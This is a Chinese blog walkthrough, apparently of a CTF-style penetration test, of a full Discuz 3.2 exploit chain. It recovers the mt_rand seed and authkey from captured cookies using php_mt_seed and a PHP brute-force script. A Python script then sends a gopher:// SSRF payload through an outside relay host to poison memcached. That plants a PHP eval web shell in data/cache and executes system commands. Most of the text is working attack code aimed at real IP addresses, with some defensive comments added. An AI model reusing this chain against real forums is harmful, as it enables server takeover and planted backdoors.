• 针对discuz3.2的渗透测试


    漏洞原理描述
    https://zhuanlan.zhihu.com/p/51907363
    想要利用这个漏洞得知道key的前缀,首先在注册的地方抓包

    GET /member.php?mod=register HTTP/1.1
    Host: 103.108.67.223:8822
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: t2xl_2132_saltkey=gdBDOHes; t2xl_2132_lastvisit=1695128831; t2xl_2132_home_readfeed=1695139099; t2xl_2132_sid=uKH55w; t2xl_2132_lastact=1695393413%09misc.php%09seccode; t2xl_2132_onlineusernum=4; t2xl_2132_sendmail=1; t2xl_2132_seccode=1.6245ef1d965178b2cf
    Upgrade-Insecure-Requests: 1

    得到这三个参数
    cookie_pre: t2xl
    saltkey: gdBDOHes
    seccode: 1.6245ef1d965178b2cf

    有这些就足够了,先用脚本生成php_mt_seed的参数

    脚本下载地址
    https://github.com/openwall/php_mt_seed

    #./php_mt_seed.sh 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 55 55 0 61 28 28 0 61 59 59 0 61 47 47 0 61 >2.txt
    #cat 2.txt | awk '{print $3}'|tr -s '\n' >seeds.txt

    然后用脚本爆破authkey

    
    // Replay every candidate mt_rand() seed recovered by php_mt_seed (one seed per
    // line in seeds.txt) and keep those whose random() stream reproduces the
    // observed 4-char cookie prefix "t2xl"; check() then tries to complete the
    // corresponding 10-char key against the captured seccode hash.
    // Defender note: this replay is possible because the values were drawn from
    // mt_rand(), whose 32-bit seed php_mt_seed can recover from a few outputs;
    // secrets of this kind should come from a CSPRNG (random_bytes()) instead.
    $seeds_file = file_get_contents('seeds.txt');
    $seeds = explode("\n",$seeds_file);
    //var_dump($seeds);
    for($i=0;$i<count($seeds);$i++){
        // A trailing newline leaves an empty last element; intval('') is 0, so
        // seed 0 gets tried as well (harmless, just one extra iteration).
        mt_srand(intval($seeds[$i]));
        // Call order matters for the replay: the 10-char key is drawn first and
        // the 4-char prefix second, so the prefix is what we can compare against.
        $auth_key = random(10);
        $tmp = random(4);
        if($tmp == 't2xl'){
            echo "=====================================\n";
            echo "seed:".intval($seeds[$i])."\n";
            echo "key:".$auth_key."\n";
            check($auth_key);
        }
    }
    // Given a 10-char key candidate, brute-force the 6 hex digits that precede it
    // (see pad()) by recomputing the seccode hash and comparing its tail with the
    // 18 hex chars carried in the captured seccode cookie. Prints the full key on
    // a hit and terminates the script; prints a newline and returns otherwise.
    function check($key){
        $saltkey = 'gdBDOHes';   // saltkey value taken from the captured cookie
        // NOTE(review): the bound is exclusive, so 0xffffff (16777215) itself is
        // never tried; `$i<=16777215` would cover the whole 24-bit range.
        for($i=0;$i<16777215;$i++){
            if($i%1000000==0){
                echo ".";   // progress marker: one dot per million candidates
            }
            // '10' = seccode id '1' (the "1." of the captured "1.6245..." cookie)
            // followed by uid 0. The author's original note read "90 = ssid . $_G['uid'],
            // ssid from seccode is 9, uid is 0"; the 9 presumably came from a different
            // capture -- confirm against the cookie actually being tested.
            // substr(..., 8, 18) selects the 18-char slice the cookie stores.
            if(substr(md5('10'.md5(pad($i).$key.$saltkey)),8,18)=='6245ef1d965178b2cf'){
                echo "\nFound key:".pad($i).$key;
                die();   // first match wins; stops the whole script, not just this loop
            }
        }
        echo "\n";
    }
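    // Return the lowercase hex form of $i zero-padded to at least 6 digits, the
    // width of the 24-bit counter check() iterates over.
    // sprintf() never truncates, so values above 0xffffff come back with 7+ digits
    // instead of the str_repeat() with a negative count the original ternary produced.
    function pad($i){
        return sprintf('%06x', $i);
    }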
    // Build a string of $length characters drawn from the alphanumeric alphabet
    // below, exactly one mt_rand() call per character. The call order is what the
    // seed replay above depends on (presumably this mirrors the forum's own
    // random() helper -- confirm before changing anything here).
    function random($length) {
        $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
        $last = strlen($alphabet) - 1;
        $out = '';
        $remaining = $length;
        while ($remaining > 0) {
            $out .= $alphabet[mt_rand(0, $last)];
            $remaining--;
        }
        return $out;
    }
    
    
    import requests
    import base64
    import sys
    import time
    
    # Take the 6 chars that follow the cookie prefix "t2xl" in this string as the
    # memcached key prefix. Where the string itself comes from is not shown on this
    # page -- presumably the key recovered by the PHP script above; verify.
    memory_prefix = 'Pyk94mAlBUt2xlWzj0Ps3tPuwkQLyNAQbvyQw5qQn69DKxNL11Vh'.split('t2xl')[1][:6]
    # gopher:// URL aimed at localhost:11211 (memcached) that stores a URL-encoded,
    # serialized PHP array under "<prefix>_setting"; the embedded file_put_contents()
    # targets data/cache/s1s.php. The SSRF sink is the forum's remote-image fetch.
    # Defender notes: a memcached "set" on *_setting arriving from the web host, or a
    # gopher:// URL in a downremoteimg request, are the things worth alerting on;
    # keeping memcached unreachable from the web tier and rejecting non-http(s)
    # schemes in the image fetcher closes the path.
    payload = f"gopher://localhost:11211/_set%20{memory_prefix}_setting%201%200%20222%0Aa%3A2%3A%7Bs%3A6%3A%22output%22%3Ba%3A1%3A%7Bs%3A4%3A%22preg%22%3Ba%3A2%3A%7Bs%3A6%3A%22search%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A5%3A%22%2F.*%2Fe%22%3B%7Ds%3A7%3A%22replace%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A68%3A%22file_put_contents('.%2Fdata%2Fcache%2Fs1s.php'%2C'%3C%3Fphp%20eval(%24_POST%5Bi%5D)%3B%3F%3E')%22%3B%7D%7D%7Ds%3A13%3A%22rewritestatus%22%3Bi%3A1%3B%7D"
    
    # The gopher URL is base64-wrapped and handed to a second host's index.php?url=
    # parameter; that host (23.95.215.34) is not the forum, so it presumably acts as
    # a relay that decodes and follows the URL -- not shown here.
    gopher = base64.b64encode(payload.encode()).decode()
    
    attack_url = f'http://23.95.215.34/index.php?url={gopher}'
    
    # Session cookies for the forum. NOTE(review): saltkey/seccode/sid differ from the
    # capture shown earlier on this page, so these must belong to a separate live session.
    cookies = {
        "home_lang":"cn",
        "admin_lang":"cn", 
        "t2xl_2132_saltkey":"TqPuF2ai", 
        "t2xl_2132_lastvisit":"1695123382",
        "t2xl_2132_seccode":"2.2c72b0f6f9fd3e206c", 
        "t2xl_2132_sid":"OwGkfW",
        "t2xl_2132_lastact":"1695318878%09forum.php%09ajax"
    }
    # forum.php?mod=ajax&action=downremoteimg makes the forum fetch the [img] URL
    # server-side; the .jpg suffix presumably satisfies an extension check -- confirm.
    url = f'http://103.108.67.223:8822/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]{attack_url}.jpg[/img]&inajax=1&fid=2&wysiwyg=1&formhash=362a2904&posttime=1476777238&wysiwyg=1&subject=test&unused%5B%5D=1'
    
    # Responses of the first two requests are never inspected; re1 triggers the
    # fetch, re2 is an ordinary ajax call that presumably makes the forum read the
    # cache entry back (inferred from ordering only).
    re1 = requests.get(url,cookies=cookies)
    
    re2 = requests.get("http://103.108.67.223:8822/forum.php?mod=ajax&action=getthreadtypes&inajax=yes")
    
    # Final check: a 404 here means the file under data/cache was not written.
    re3 = requests.post('http://103.108.67.223:8822/data/cache/s1s.php',data={'i':'system("cat /flag");'})
    if(re3.status_code!=404):
        print(re3.text)
    
                
    
    
    
  • 原文地址:https://blog.csdn.net/qq_42307546/article/details/133189048